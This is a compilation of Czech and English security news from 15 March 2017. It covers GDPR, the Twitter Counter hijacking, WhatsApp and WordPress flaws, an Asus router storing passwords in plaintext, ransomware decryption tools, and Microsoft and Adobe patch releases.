Ochrana osobních údajů přitvrdí, firmy by se měly připravit
15.3.2017 SecurityWorld Zabezpečení
Úniky dat nebo interních informací způsobují firmám nemalé škody, ať už finanční, nebo na dobré pověsti. Ještě významnější roli bude v dohledné době hrát také zabezpečení osobních dat, které firmy zpracovávají nebo schraňují.
Zejména se zahájením platnosti nařízení na ochranu osobních údajů (GDPR) z dílny Evropské unie v květnu 2018. To zavádí za porušení pravidel vedoucí k úniku dat velmi vysoké finanční sankce, a navíc ukládá organizacím povinnost všechny takové incidenty hlásit. Je to ale opravdu v praxi reálné? A jak je to se zodpovědností za bezpečnost dat?
Většina lidí, včetně IT profesionálů se domnívá, že za vážnější porušení ochrany dat by měl zodpovídat výkonný ředitel společnosti. To je ale velmi diskutabilní, protože vrcholové vedení se často o porušení ochrany dat vůbec nedozví, navíc velká část narušení nebo pokusů o ně není vůbec zjištěna.
V nedávném průzkumu společnosti Accenture více než polovina oslovených odborníků na bezpečnost (51 %) přiznává, že trvá měsíce, než se sofistikovaná narušení podaří odhalit, a bezpečnostní týmy vůbec neodhalí celou třetinu úspěšných narušení bezpečnosti.
„Odpovědnost za osobní data má společnost, která takováto data zpracovává nebo schraňuje. Za konkrétní únik je ale vždy zodpovědná konkrétní osoba. Pokud někdo svým jednáním někoho poškodí, ať už záměrně nebo neúmyslně, vždy mohl a může být poháněn k zodpovědnosti a k náhradě škody,“ uvádí Dagmar Mikulová, finanční ředitelka Počítačové školy Gopas. „Pokud organizaci vznikne škoda, bude se snažit najít viníka. Prokázání konkrétního činu je ale většinou v praxi velmi problematické.“
Jakým způsobem nejčastěji firmy o data přicházejí? Převládají tři hlavní cesty možného úniku dat. První je špatné zabezpečení proti neoprávněnému přístupu útočníka z internetu.
„Zde je možné se chránit technickými prostředky – používat firewally, antimalware, aktualizovat software a hardware, správně vše nastavit,“ říká Mikulová.
Druhým je tzv. inside job, tedy krádež dat oprávněným uživatelem zevnitř firmy.
„Proti krádeži dat zaměstnancem, který má oprávnění k práci s daty, protože s nimi musí pracovat, se účinně chránit nedá,“ konstatuje Dagmar Mikulová. „Marketingová tvrzení firem vyrábějících tzv. DLP systémy (data leakage prevention) je třeba brát s rezervou. Jediná smysluplná ochrana je rozdělit pracovní náplň zaměstnanců a neumožnit každému přístup ke všem datům,“ dodává Mikulová.
Třetím je opět inside job, nicméně někým jiným, než přímo oprávněným pracovníkem, pokud ten dělá nějaké chyby, nebo nedodržuje správné postupy.
„Proti chybám zaměstnanců je možné se bránit pouze jejich vzděláváním, udržováním bezpečnostního povědomí a pravidelnými bezpečnostními školeními, jak technologií, tak metodologie,“ uzavírá Dagmar Mikulová.
Cokoliv sdílíte, může být a bude použito proti vám
15.3.2017 SecurityWorld BigBrother
Ano, CIA se vám může nabourat do televize. Skutečnou škodu vám ale napáchají spíš vaše aktivity na Facebooku.
Pár dní stará kauza Wikileaks vs CIA vzbudila pozdvižení a nejistotu, zda zpravodajská agentura nemůže sledovat taky nás. Jak už to ale v podobných případech bývá, panika je poněkud přehnaná, přiživená senzacechtivými médii. Kauza připomněla především to, co všichni víme, a totiž, že jakékoliv zařízení s kamerou, mikrofonem nebo IP adresou může být hacknuto. Otázka je – bude CIA sledovat i nás? Šance, že ano, se blíží nule. A pokud se tak skutečně stane, pravděpodobně to na náš život nebude mít žádný vliv.
Čímž netvrdíme, že se není třeba chovat obezřetně. Ano, používejte šifrovanou komunikaci, nerozklikávejte odkazy z pochybných e-mailů a klidně si po vzoru Marka Zuckerberga přelepte kameru na notebooku izolepou. Vaše protiopatření by však měla odpovídat spíš tomu, co se může pravděpodobně skutečně stát, než tomu, co hrozí teoreticky. Takže ano, zkuste se vyhnout tomu, aby se do vašeho počítače někdo naboural, ale mnohem větší pozornost věnujte například tomu, co píšete na sociálních sítích. Tam se totiž vystavujete skutečnému riziku.
Nesdílíte nežádoucí příspěvky?
Americká vláda loni po vybraných žadatelích o vízum žačala požadovat jejich účty na sociálních sítích, aby mohla prověřit možné vazby na teroristické organizace. Posledních pár týdnů tuhle praxi vykonávají celní a bezpečnostní pracovníci přímo při vstupu do země. Nezajímají je přitom jen veřejné příspěvky, ale i ty soukromé a opatření by se mělo v budoucnu rozšířit nejen na sociální sítě, ale internet jako takový. Vláda už má na stole dokonce návrh, aby takto lustrováni byli nejen občané muslimských zemí, ale také Číňané. Chce zkrátka dle aktivity na internetu určovat, kdo je důvěryhodný a kdo nikoliv a je pravděpodobné, že tento trend najde uplatnění i v jiných zemích.
Nejde však jen o cestování. Aktivitu na sociálních sítích u zájemců o studium prověřuje až polovina vysokých škol a mezi pojišťovnami najdeme takové, které na Facebooku pátrají po stopách o tom, zda jejich budoucí klienti nežijí až příliš riskantní život, který by se jim ve finále mohl prodražit. U zaměstnavatelů se množství těch, kteří na sociálních sítích prověřují své potenciální budoucí zaměstnance, dostává k 60 %, přičemž stávající zaměstnance takto pravidelně kontroluje víc než 40 % nadřízených, z nichž každý čtvrtý v průzkumu přiznal, že na sociální síti už našel něco, co ho přimělo zaměstnance pokárat nebo rovnou vyhodit. Přesto to je nic proti tomu, co nás v tomto ohledu nejspíš ještě čeká.
Sociální sítě o vás řeknou víc, než si myslíte
Vaše příspěvky na sociálních sítích jsou skutečně pomyslným oknem do vaší duše. Tak například: Facebook před pár dny spustil AI nástroj schopný analyzovat, zda lidé nemají sebevraždené sklony, stránka www.wefeel.csiro.au pro změnu detektuje kolektivní náladu ve společnosti na základě příspěvků na Twitteru. A není pochyb nad tím, že z analýzy sociálních sítí a prodeje těchto dat se stane velký byznys.
Čínská vláda už dokonce zkušebně spustila projekt Social Credit System, jehož cílem je „oznámkovat“ každého občana právě na základě těchto analýz, ke kterým přičítá ještě trestní záznamy a také finanční aktivitu dotyčných. Výsledná známka má následně určit lidem jejich práva, privilegia a možnosti v nejrůznějších oblastech života. A byť je projekt teprve v plenkách, vláda už na jeho základě zakázala létat či cestovat vysokorychlostními vlaky skoro sedmi milionům lidí, jež údajně včas neplatí své dluhy. Význam sociálních médií je přitom alarmující. Chcete zlepšit známku? Pochvalte na sociálních sítích vládu. Zastáváte se Tibetu? Šup s celkovým skóre dolů...
Západní způsob kontroly populace skrz sociální média je sice víc postaven na svobodě, ovšem i tak vám může pěkně zkomplikovat život. Už dnes jsou vyvíjeny aplikace schopné z vašich účtů stáhnout veškerá data a příspěvky a následně vás „zaškatulkovat“, přičemž přesnost této charakterizace poroste s rozvojem umělé inteligence. V nedaleké budoucnosti tak bude výsledkem vašich aktivit na sociálních sítích (a internetu obecně) složka, která může hrát význam při vaší žádosti o vízum, půjčku, práci a tak dále. A co je nejhorší? Že o tom ani nemusíte vědět.
Takže ano, CIA se vám může nabourat do vaší chytré televize, pravděpodobně to ale neudělá. Daleko větší hrozbu představují sociální média. Protože cokoliv na nich sdílíte, může být a bude použito proti vám.
Masivní hackerský útok na účty Twitteru, stopa vede do Turecka
15.3.2017 Novinky/Bezpečnost BigBrother
Na Twitter se zaměřili hackeři. Podařilo se jim napadnout stovky ověřených účtů na této mikroblogovací síti, jsou mezi nimi například účty Evropského parlamentu, Amnesty International, UNICEF, mediálních firem i známých osobností. Ve středu o tom informovala na svém webu televize CNBC.
Na napadených účtech o sobě útočníci dali okamžitě vědět. Publikovali příspěvky, ve kterých například označují Nizozemsko a Německo kvůli chování vůči Turecku za nacisty, vzkazy jsou psané turecky. Některým uživatelům byla u profilu změněna fotografie, objevila se tam turecká vlajka a erb Osmanské říše.
Na jednom ze vzkazů, takzvaných tweetů, se objevil i hákový kříž, symbol nacistického Německa. Objevily se také hashtagy, které v překladu znamenají nacistické Německo a nacistické Holandsko, a tweet podporující tureckého prezidenta Recepa Tayyipa Erdogana. Tweet také odkazuje na video s Erdoganem a zmiňuje datum 16. dubna, kdy se bude konat referendum, které by mělo posílit pravomoci prezidenta.
Kdo stojí za útokem, není v tuto chvíli jasné. Žádná hackerská skupina se k němu zatím oficiálně nepřihlásila.
Follow
Alex Hern ✔ @alexhern
Looks like the mass hack that's hit a bunch of twitter accounts stems from http://twittercounter.com
8:29 AM - 15 Mar 2017
87 87 Retweets 34 34 likes
Takto vypadaly zprávy hackerů, které posílali prostřednictvím napadených účtů.
Mezi napadenými jsou profily časopisu Forbes, bitcoinové peněženky Blockchain, německého fotbalového klubu Borussia Dortmund, japonského účtu Justina Biebera či profil britského ministerstva zdravotnictví.
Mluvčí Twitter Counter CNBC řekl, že jsou si této situace vědomi a vyšetřují ji.
Twitter je v tom nevinně
Podle řady zahraničních serverů, například The Verge a Krebs on Security, však tato mikroblogovací síť útoku zabránit nemohla. Narušena totiž nebyla ona sama, ale analytická aplikace třetí strany nazvaná Twitter Counter. Právě to umožnilo hackerům zotročit účty, které jsou na tuto službu navázány.
Mezi Tureckem a Nizozemskem panuje delší dobu napětí. Minulý týden označil Erdogan nizozemskou vládu za nacistickou a fašistickou. Nizozemsko o víkendu označilo tureckou ministryni pro záležitosti rodiny za nežádoucí osobu a eskortovalo ji do Německa.
Ministryně se chystala v Rotterdamu promluvit k členům místní turecké komunity a přesvědčit je, aby v dubnovém referendu o změnách turecké ústavy hlasovali pro posílení pravomocí hlavy státu. Erdogan varoval, že Nizozemsko za své aktivity zaplatí. V podobném sporu je Turecko s Německem.
Whatsapp obsahoval díru, která umožňovala snadný přístup k fotografiím i soukromým chatům
15.3.2017 Živě.cz Zranitelnosti
Webová verze oblíbeného komunikátoru Whatsapp obsahovala zranitelnost, která umožňovala útočníkům převzít kontrolu nad účtem oběti, stáhnout veškeré fotografie nebo si přečíst kompletní historii konverzací. Podobně potom mohli být napadeni také uživatelé komunikátoru Telegram. Informovali o tom bezpečnostní analytici společnosti Check Point.
Chybu útočníci mohli zneužít v případě kteréhokoliv uživatele, který pro komunikaci používal webové rozhraní. Škodlivý kód zabalili do souboru, který se tvářil jako obyčejná fotografie, po rozkliknutí však došlo k využití lokálních dat prohlížeče pro převzetí kontroly nad účtem. Útočníci mohli zneužít především dvou mechanismů, které komunikátor využíval. Prvním z nich jsou náhledy známých souborů jako jsou dokumenty, fotky, ale i webové stránky, jež se zobrazují v konverzaci. Soubor HTML tak může obsahovat libovolný kód, nicméně v náhledu může Whatsapp zobrazit pouze fotografii.
Druhým problémem potom bylo šifrování zprávy před odesláním, které zamezilo možné kontrole odesílaných souborů na straně WhatsApp. To však bylo velmi rychle napraveno a aplikace nyní kontrolují bezpečnost souborů ještě před jejich odesláním.
V případě aplikace Telegram bylo zneužití velmi podobné, analytici Check Pointu jej demonstrovali na odeslání „zábavného“ videa. Pokud na něj oběť kliknula, opět došlo k přesměrování na soubor, který dokázal využít lokálně uložená data pro převzetí kontroly nad účtem.
Jak WhatsApp tak Telegram díry v systému zalepili a útok tohoto typu by tak uživatelům aktuálně neměl hrozit.
Hackers Abuse Twitter App to Hijack High-Profile Accounts
15.3.2017 securityweek Hacking
Many high-profile Twitter accounts have been hijacked in an attack apparently motivated by the recent diplomatic dispute between Turkey and the Netherlands.
Hacktivists posted messages in Turkish containing the hashtags #Nazialmanya (Nazi Germany) and #Nazihollanda (Nazi Netherlands) on many Twitter accounts, including ones belonging to high profile organizations such as Amnesty International, the European Parliament, Duke University, UNICEF USA, Forbes, Reuters Japan, and BBC North America.
The message was also posted from the Twitter accounts of hundreds of apparently random individuals.
A majority of the affected organizations have already restored their accounts, and some of them have notified their followers about the hack.
The tweets included a link to a YouTube video showing Turkish president Recep Tayyip Erdoğan. The compromised Twitter accounts also had their profile pictures replaced with an image of the Ottoman Empire’s coat of arms.
The attack was launched just as Turkey is preparing for a referendum, scheduled for April 16, on boosting the president’s powers. The Netherlands’ recent decision to prevent Turkish ministries from addressing expatriate Turks on the matter has caused tensions between the two countries.
It appears that hackers managed to hijack a large number of Twitter accounts through Twitter Counter, a stats and marketing analytics app that reportedly has more than 2 million users and tracks over 350 million Twitter accounts. The Netherlands-based service has pointed out that it does not store any Twitter credentials or payment card information.
Follow
TheCounter @thecounter
We're aware that our service was hacked and have started an investigation into the matter.We've already taken measures to contain such abuse
9:55 AM - 15 Mar 2017
151 151 Retweets 63 63 likes
Follow
TheCounter @thecounter
Assuming this abuse is indeed done using our system, we’ve blocked all ability to post tweets and changed our Twitter app key.
10:18 AM - 15 Mar 2017
46 46 Retweets 19 19 likes
The application requests both read and write access to Twitter accounts, which allowed the hackers to send out their tweets via the service. Some of the victims said they decided to block the app following the incident.
This is not the first time Twitter Counter has been abused by hackers. In November, the company suffered a security breach that led to spam tweets being posted from high-profile Twitter accounts, including ones belonging to Playstation, Xbox, The New Yorker, Charlie Sheen, Lionel Messi, and Minnesota Governor Mark Dayton.
WordPress Content Injection Flaw Makes XSS Bug More Severe
15.3.2017 securityweek Vulnerebility
Sucuri has shared details about one of the cross-site scripting (XSS) vulnerabilities patched last week in WordPress. The flaw can be highly useful to attackers if combined with a content injection bug that has been exploited in the wild.
WordPress 4.7.3, released on March 6, patches six vulnerabilities, including three XSS issues. One of them, a stored XSS tracked as CVE-2017-6817, was identified and reported by Sucuri researcher Marc Montpas.
The flaw allows an authenticated attacker to inject arbitrary JavaScript code into posts, and it can be exploited via YouTube URLs and shortcodes. An attacker with contributor privileges can leverage the flaw to create a backdoor on the targeted website.
Since exploitation requires at least contributor privileges, the vulnerability is considered low risk. However, the risk is higher on WordPress versions prior to 4.7.2, which addresses a critical content injection and privilege escalation flaw.
The content injection vulnerability, also discovered by researchers at Sucuri, has been exploited in the wild for remote code execution and to deface a large number of web pages. Combining the content injection flaw with the stored XSS allows a remote attacker to inject malicious JavaScript code into posts on a WordPress site.
“Combined with the recent content injection vulnerability we found, it’s possible for a remote attacker to deface a random post on the site and store malicious Javascript code in it,” explained Montpas. “This code would be executed when visitors view the post and when anyone edits the post from the WordPress dashboard. As a result, an administrator tries to fix the defaced post, they would unknowingly trigger the malicious script, which could then be used to put a backdoor on the site and create new admin users.”
The stored XSS has been around for some time, even before version 4.7, while the content injection flaw affects versions 4.7 and 4.7.1. Version 4.7.x is running on roughly half of WordPress websites, and judging by the large number of sites affected by the content injection attacks, many of them are not updated automatically.
Mac users enjoy, FindZip macOS Ransomware decryption tool is available online for free
15.3.2017 securityaffairs Virus
Great news for macOS users who were infected by the FindZip macOS ransomware, Avast released a decryption tool for free.
Good news for macOS users who were infected by the FindZip ransomware, now a decryption tool was released online for free.
The FindZip macOS ransomware was spotted last month by researchers at ESET, it is tracked as OSX/Filecoder.E.
The ransomware, written in Swift, was distributed via BitTorrent distribution sites and calls itself “Patcher”, ostensibly an application for pirating popular software.FindZip ransomware OSX/Filecoder.E MAC OS ransomware,
The first release was not complete, the victims were not able to recover their files, even if they pay the ransom.
For this reason, security experts were inviting victims of the ransomware to avoid paying the ransom.
Due to coding errors, the malicious code was destroying the encryption key before sending them to the command and control server.
FindZip was born after an update to Apple’s XProtect signatures started calling it FindZip soon after. The new threat masquerades itself as cracks for Adobe Premier Pro and Microsoft Office, and also feature signed certificates.
The number of ransomware developed to target macOS user is low, FindZip is the second strain of malware designed with this purpose.
The excellent news is that victims of the FindZip macOS ransomware now have the opportunity to recover their files for free thanks to the experts at the security firms Malwarebytes and Avast.
A couple of weeks ago, experts from Malwarebytes Labs researchers published the instructions to restore data encrypted by the FindZip macOS ransomware.
The procedure uses the following elements:
Xcode or TextWrangler
Xcode command-line tools
pkcrack source code
One unencrypted file and the corresponding encrypted file
The process also requires a second account on the infected.
The process has been automated later by experts from Avast who developed the FindZip decryption tool. Victims can decrypt their files on either a Mac or a Windows machine by using the tool.
“MalwareByte already published a technical analysis of FindZip, as well as a description of the decryption process. However, because the instructions described by MalwareBytes may be complicated for some, we created a more user friendly decryption application.” reads a blog post published by AVAST.
“The FindZip decryption tool is available on our free ransomware decryption tools page, along with all of our ransomware decryption tools.”
The tool was successfully tested on macOS 10.10 (Yosemite) and macOS 10.12 (Sierra).
Victims that decide to copy the encrypted files from their infected Mac to a Windows system, using the Avast decryptor should be straightforward and they don’t need to install any other software.
The researchers explained that on Mac or Linux, the users need an emulation layer for Windows and the tool works with CrossOver and Wine. The researchers at Avast confirms that other emulation programs might work as well.
Victims have to install a windowing system for Mac, such as XQuartz, which allows the execution of Wine for Mac.
“Important note: If you already had Wine installed prior to being infected with the ransomware, the entire Wine configuration is probably encrypted. In that case, you need to delete the folder \Users\<YourUserName>\.wine before running the decryptor application.” continues the post.
Enjoy the tool!
Routery Asus RT-N10R ukládají heslo v plaintextu
15.3.2017 Root.cz Zabezpečení
Zatím nepublikovaná zranitelnost byla čirou náhodou objevena na routeru Asus RT-N10R. Ač to není žádná katastrofa, je to určitý druh zranitelnosti, o které se mohou Spolu s tím se také budete moci dozvědět, proč je i tato chybka problém a proč může být nazvána zranitelností. Jako bonus si pak také přečtete, jak a za jakých okolností byla zranitelnost odhalena.
Popis zranitelnosti
U routeru Asus RT-N10R jsem zjistil, že při vytvoření zálohy si do ní router ukládá heslo, tak jak je, v plaintextu, nehašované. Spolu s tím ukládá uživatelské jméno, model a výrobce, opět v plaintextu. Soubor zálohy je tedy slabé místo. Zálohování v této formě poměrně jistě dokazuje, že si router heslo ukládá úplně stejně i uvnitř nevolatilní paměti.
Proč si tím můžeme být jisti? Při správně implementované hašovací funkci s dostatečně kvalitní solí není možné získat zpět původní heslo, a to pak ukládal do zálohy. Každý alespoň trochu příčetný programátor by to nikdy nedělal, protože je daleko jednodušší něco uložit, než si muset napsat de-hašovací algoritmus, který by byl navíc slabinou routeru.
Demonstrace zranitelnosti
K demonstraci je zapotřebí samozřejmě zmíněný router a ideálně nějaký „Hex editor/reader". Pak už se jen změní heslo na nějaké známé a uloží se souboru zálohy. Ten pak otevřete zmíněným editorem. Vzhledem k tomu že předpokládám, že zmíněný router nemáte, poskytnu screenshot toho, co je v Hex editoru vidět. Nechám vás zatím v obrázku heslo najít.
Zálohované heslo bylo: Azsemsmispritale
Předpokládám, že jste heslo vykoukali z obrázku sami. Dále je ze zálohy možné vyčíst určitě ještě model, výrobce a v další části dokumentu kterou nezveřejňuji (nevím, co citlivého se dá z té zálohy „přečíst“) se lze např. dozvědět i použitý ntp server.
Proč je to problém
Možná si teď říkáte: „Vždyť je to přece soubor zálohy. Pokud mi někde neproklouzne, jsem v bezpečí“. Problém je ale právě v onom „pokud“, které není možné nikdy stoprocentně zajistit. Také netušíme, jak je naprogramované. Vzhledem k tomu že router pravděpodobně bude mít vaše heslo na nějaké paměťové buňce ve flash paměti, tak jednoduše nelze zaručit, že se z té buňky nedostane ven.
Připomeňme bezpečnostní chybu rom-0, která umožňovala na dálku stáhnout z routerů právě soubor zálohy. Pokud je v ní heslo uloženo v otevřené podobě, může se útočník okamžitě k síti přihlásit a router ovládnout.
Jsou dvě možnosti, jak se může dostat heslo ven:
nedostatkem software
hardwarovou cestou
Nedostatkem software
Takové nedostatky můžou způsobit, že za správných podmínek (např. zadáním správné adresy) se můžeme heslo od routeru dozvědět. Tento druh zranitelnosti existoval a byl patchováni v minulém updatu firmware. Na některých routerech je například vzdáleně dostupný terminál s privilegovaným přístupem, a tudíž je přes něj přístup do úplně celé paměti flash. Nakonec nevíme, jak se router vyrovnává s extrémní zátěží např. při DoS útoku.
Hardwarovou cestou
Většina z vás ví, že existuje způsob, kterým lze číst a zapisovat přímo do paměti. Používá se ICSP, JTAG a podobné. Existují také přímo čtečky flash pamětí.
Jednoduše řečeno, i BIOS na vašem počítači tam musel někdo něčím nahrát, a stejná věc platí o jakékoliv moderní elektronice. Co jde nahrát, by mělo jít i stáhnout.
Jak by to mělo být správně a proč
Jak to správně udělat
Za ideálních podmínek by žádné zařízení, které používá k ověření uživatele jeho jméno a heslo, alespoň to heslo nemělo znát. Tak se to i na slušných službách a ve slušných zařízeních děje. Způsob, jakým vás ověřují, je následující.
V algoritmu, který se stará o ukládaní/ověřování hesla, jsou dvě základní součásti:
generátor náhodného řetězce (říká se mu sůl)
hašovací algoritmus
Při prvním přihlášení tento algoritmus převezme vaše heslo a vygeneruje si sůl. Pak vám vaše heslo pořádně „osolí“. Je důležité, aby se sůl neopakovala a byla dost dlouhá. Pak ideálně přepíše/vymaže paměťový blok, kde bylo heslo uloženo v čitelné podobě. Nakonec se osolené heslo dá do hašovacího algoritmu a ten vrátí haš.
Tento haš spolu se solí a vašim uživatelským jménem pak uloží do relační tabulky. Tady je důležité, aby byl hašovací algoritmus dost silný a každá sebemenší změna v heslu generovala naprosto odlišný haš.
Při každém dalším přihlášení se udělá stejný postup, jen sůl se už znovu negeneruje a podle uživatelského jména se vybírá a čte z tabulky a přidává stejným způsobem k vašemu heslu. Výsledný haš zadaného a soleného hesla se pak porovná s uloženou podobou. Pokud se obě varianty shodují, jste přihlášeni, v opačném případě odmítnuti.
Proč to takto složitě dělat
Jednoduše: zařízení/služba vůbec heslo nezná. Jediné, co se ukládá, je haš a sůl, a zjišťování původních hesel je proto extrémně náročné.
Další výhoda je, že i kdyby všichni uživatelé měli stejné heslo, pokaždé bude v tabulce jiný haš. Nemůžete tedy odhadnout jejich hesla nijak jednoduše, kvůli podobnosti haše. Pro zjištění všech hesel musíte prolomit všechny haše, ne jen jeden.
Pro zvědavce: v této oblasti mě velmi poučilo video na YouTube, podívejte se na něj.
Reakce Asusu
Asus jsem o této skutečnosti samozřejmě informoval. Napsal jsem report nejprve česky (na českou pobočku) a byl jsem informován, že požadavek musím napsat anglicky a že jej přepošlou do centrály. Dodnes se mi nikdo další už neozval.
Laxní přístup je sice nepříjemný, ale z ekonomického hlediska pochopitelný. Router byl už na začátku prodeje velmi levný. Není tedy možné od výrobce čekat, že bude vynakládat další peníze na prakticky mrtvý a pravděpodobně sotva výdělečný produkt.
Způsob odhalení chyby
Přiblížím vám, jak jsem chybu objevil. Všechno to začalo zprávou od mého bývalého zaměstnavatele, která zněla asi takto: „někdo nám hacknul router, někde jsi musel vyzradit heslo“. K tomu, že router někdo nahackoval, vedla zaměstnavatele změna stavu routeru: připojení bylo pomalé a s původním heslem nebylo možné se přihlásit.
Začal jsem rychle přemýšlet, kudy mohlo heslo uniknout. Po vyloučení jiných možností jsem došel k souboru zálohy, které jsem spolu s návodem, jak router uvést do „známého“ funkčního stavu dal k dispozici na společné firemní úložiště. Soubor jsem tedy stáhnul a otevřel v textovém editoru. Uviděl jsem kupu „rozsypané rýže“ a plno NULL, BEL, ETB, EOT a dalších řídicích znaků.
Přemýšlel jsem nad tím, co by to mohlo rozumněji otevřít, a nakonec stačil obyčejný hexeditor. Pak jsem začal v souboru zálohy hledat a velmi rychle jsem začal hořekovat nad tím, proč to někdo takhle hloupě naprogramoval.
Jak to celé dopadlo
Naštěstí to má dobrý konec. Zaměstnavatel si naštěstí spletl verze dokumentu, které jsem mu posílal mailem a verze s hesly zůstaly ve firmě. Druhá verze se dostala do cloudového úložiště bez hesel – k ní mohlo mít pár zaměstnanců přístup, což si ale reguloval zaměstnavatel.
Dále tu bylo podezření, že se soubory dostaly k některé ze spřátelených organizací, které působí ve stejné budově. Ověřoval jsem to, ale nestalo se tak a sdílena byla jen upravená verze bez záloh. Pokud tedy soubor někam utekl, byla to pravděpodobně chyba zaměstnavatele.
Nakonec jsme pořídili novější, který byl stejně potřeba. U Asusu jsme změnili heslo, pro jistotu.
Microsoft Finally Releases Security Patches For Publicly-Disclosed Critical Flaws
15.3.2017 thehackernews Vulnerebility
After last month's postponement, Microsoft's Patch Tuesday is back with a massive release of fixes that includes patches for security vulnerabilities in Windows and associated software disclosed and exploited since January's patch release.
Meanwhile, Adobe has also pushed out security updates for its products, releasing patches for at least seven security vulnerabilities in its Flash Player software.
Microsoft patched a total of 140 separate security vulnerabilities across 18 security bulletins, nine of them critical as they allow remote code execution on the affected computer.
Microsoft Finally Patches Publicly Disclosed Windows Flaws
Among the "critical" security updates include a flaw in the SMB (server message block) network file sharing protocol, which had publicly disclosed exploit code since last month. The original patch released last year for this flaw was incomplete.
The flaw is a memory corruption issue that could allow remote code execution (RCE) of a malicious code if an attacker sends specially crafted messages to a Microsoft SMBv1 server.
All versions of Microsoft Windows are affected by this issue that could allow a remote, unauthenticated attacker to crash systems with denial of service attack.
Microsoft admitted: "Remote code execution vulnerabilities exist in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerabilities could gain the ability to execute code on the target server. To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server."
Microsoft patched the vulnerability but did not credit Laurent Gaffié, who found the flaw last year and released the exploit code in February.
Microsoft Also Patches Flaws Uncovered By Google
Another critical patch (MS17-013) contains a dozen of serious flaws in Windows' Graphics Component GDI Library used in Office, Skype, Lync, and Silverlight.
The flaws reside in the way Windows handles certain image files. Hackers can exploit the weaknesses to achieve remote code execution on your system by making you visit a booby-trapped website or open a malware-ridden document. No further user interaction is needed.
Google's Project Zero also disclosed this flaw with proof-of-concept exploit late last month before Microsoft had fixed it.
All supported releases of Microsoft Windows back to Windows Vista are vulnerable to this flaw. The tech giant originally patched this issue in June last year, but the patch was incomplete.
Microsoft also patched seven other critical flaws, including two cumulative updates for Internet Explorer and its Edge browser, and nine important ones.
In late last month, Google's Project Zero research team publicly disclosed details and proof-of-concept exploit for a code execution flaw in Microsoft's Internet Explorer and Edge browsers that could allow attackers to cause a crash of the browsers.
Meanwhile, Adobe also released patches for its Flash Player software for Windows, Macintosh, Linux and Chrome OS.
Users are advised to apply Windows as well as Adobe patches to keep away hackers and cybercriminals from taking control over your computer.
PetrWrap, a Petya-based ransomware, was used in targeted attacks
15.3.2017 securityaffairs Virus
Threat actors in the wild have found the way to hijack the Petya ransomware on the fly and use it in targeted attacks, say welcome to PetrWrap ransomware.
The Petya ransomware was first spotted by experts at TrendMicro one year ago, it overwrites MBR to lock users out of the infected machines.
The Petya ransomware causes a blue screen of death (BSoD) by overwriting the MBR with malicious code that encrypts the drive’s master file table (MFT).
When the victim tries to reboot the PC, it will impossible to load the OS, even in Safe Mode. Users turning on the computer are displayed a flashing red and white screen with a skull-and-crossbones instead.
petya ransomware
The Petya ransomware has a RaaS model, but the attackers developed a special module to patch the original Petya ransomware “on the fly.”
The attackers first compromised the networks of target organizations, then used the PsExec tool to install a ransomware on all endpoints and servers.
The variant of Petya group used in the attack was dubbed PetrWrap.
“The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine.” reads the analysis published by Kaspersky. “What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.”
PetrWrap ransomware
The authors of the PetrWrap ransomware have devised a method to force Petya in using an encryption key that is different from the one that the original creators have hardcoded.
Using this mechanism, the attackers can decrypt the files in any time. The PetrWrap also removes all mentions of Petya from the ransom message, as well as its animation red skull designed in ASCII.
Why do hackers hijack the Petya ransomware?
First, because attackers don’t need to write a ransomware from scratch, second, because the version used by threat actors is stable and not affected by major flaws.
The bad news for the victims is that currently there isn’t a recovery tool to decrypt the MFT of hard disk volumes infected by Petya. The experts noticed anyway that because this specific ransomware doesn’t encrypt the file contents, it is possible to reconstruct the file from hard disk raw data by using specific recovery tools.
Summarizing, the PetrWrap ransomware achieves the following goals:
The victim’s machine is locked and the MFT of NTFS partitions is encrypted securely (because Petya v3 which is used in this attack doesn’t have flaws of the earlier versions and implements Salsa20 correctly);
The lockscreen doesn’t show the flashing skull animation and doesn’t contain any mentions of Petya which makes it harder to assess the situation and determine the extent of the caused damage;
The developers of PetrWrap didn’t have to write the low-level bootloader code and risk making mistakes similar to the ones observed in earlier versions of Petya.
Security updates fix critical vulnerabilities in Flash player and Shockwave player
15.3.2017 securityaffairs Vulnerebility
Adobe patches vulnerabilities in Flash Player and Shockwave for Windows, Mac, Linux and Chrome OS.
Adobe issued security updates for Flash Player and Shockwave Player products. The security updates released by the company on Tuesday address seven vulnerabilities in Flash Player and one flaw in Shockwave Player.
The Flash Player 25.0.0.127 version fixes critical security vulnerabilities that affect version 24.0.0.221 and earlier on Windows, Mac, Linux and Chrome OS.
The flaws could be exploited by an attacker to gain control over the vulnerable system.
“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. ” reads the security advisory published by Adobe.
The list of vulnerabilities addressed by the security updates includes a buffer overflow CVE-2017-2997 flaw, two memory corruption issues (CVE-2017-2998, CVE-2017-2999), a random number generator flaw (CVE-2017-3000), and three use-after-free vulnerabilities (CVE-2017-3001, CVE-2017-3002, CVE-2017-3003).
Adobe thanked the following researchers for reporting the flaws:
Tao Yan (@Ga1ois) of Palo Alto Networks (CVE-2017-2997, CVE-2017-2998, CVE-2017-2999)
Wang Chenyu and Wu Hongjun of Nanyang Technological University (CVE-2017-3000)
Yuki Chen of Qihoo 360 Vulcan Team working with Chromium Vulnerability Rewards Program and Anonymous working with Trend Micro’s Zero Day Initiative (CVE-2017-3001)
Yuki Chen of Qihoo 360 Vulcan Team working with Chromium Vulnerability Rewards Program (CVE-2017-3002, CVE-2017-3003)
Flash Player Shockwave updates
The security updates also fixed an important privilege escalation flaw in Shockwave Player (CVE-2017-2983) related to the directory search path used to find resources.
The flaw discovered by Nitesh Shilpkar.
According to Adobe, there is no evidence that vulnerabilities fixed by the security updates have been exploited by threat actors in the wild.
Hrozí vám exekuce, oprášili podvodníci starý trik
15.3.2017 Novinky/Bezpečnost Kriminalita
Na pozoru by se měli mít lidé před e-maily, ve kterých se kybernetičtí podvodníci vydávají za zaměstnance exekutorského úřadu. V posledních dnech se s nimi totiž doslova roztrhl pytel, jak varoval Národní bezpečnostní tým CSIRT.CZ, který je provozován sdružením CZ.NIC.
